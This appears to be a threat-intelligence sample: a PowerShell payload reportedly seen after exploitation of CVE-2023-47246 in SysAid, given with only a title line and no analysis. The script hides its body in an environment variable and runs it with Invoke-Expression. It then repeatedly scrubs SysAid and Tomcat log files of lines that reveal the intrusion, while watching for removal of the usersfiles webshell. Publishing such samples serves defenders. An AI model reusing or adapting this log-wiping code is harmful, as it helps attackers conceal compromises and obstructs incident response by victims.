Observed secondary PowerShell payload following CVE-2023-47246 exploitation

sysaid_postexp_02_pwsh_event.ps1

$env:SehCore = '@

$tomcat_dir = "C:\Program Files\SysAidServer\tomcat";
$log4j_dir = "C:\Program Files\SysAidServer\root\WEB-INF\logs";
$log4jPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=11891398229";
$tcPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=11891398229";

function cleanLL {
    $fl = Get-ChildItem "$log4j_dir";
    for ($i=0; $i -lt $fl.Count; $i++) {
        $logFile = $fl[$i].FullName;
        if (Select-String -Pattern "$log4jPattern" -Path "$logFile") {
            Get-Content -Path "$logFile" | Select-String -Pattern "$log4jPattern" -NotMatch | Set-Content -Path "$logFile.bck";
            cp "$logFile.bck" "$logFile"
        }
    }
    $fl = Get-ChildItem "$tomcat_dir\logs\";
    for ($i=0; $i -lt $fl.Count; $i++) {
        $logFile = $fl[$i].FullName;
        if (Select-String -Pattern "$tcPattern" -Path "$logFile") {
            Get-Content -Path "$logFile" | Select-String -Pattern "$tcPattern" -NotMatch | Set-Content -Path "$logFile.bck";
            cp "$logFile.bck" "$logFile"
        }
    }
}

sleep 5;
cleanLL;

while(1) {
    sleep 5;
    if(!(Test-Path "$tomcat_dir\webapps\usersfiles.war")) {
        while((Test-Path "$tomcat_dir\webapps\usersfiles")) {
            sleep 1;
        }
        cleanLL;
        break;
    }
    if((Test-Path "$tomcat_dir\webapps\usersfiles\leave")) {
        Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave";
        sleep 5;
        cleanLL;
        break;
    }
    else {
        cleanLL;
    }
}

@'

$s=$env:SehCore;

$env:SehCore="";

Invoke-Expression $s;

;echo CLN_ST;

exit 0;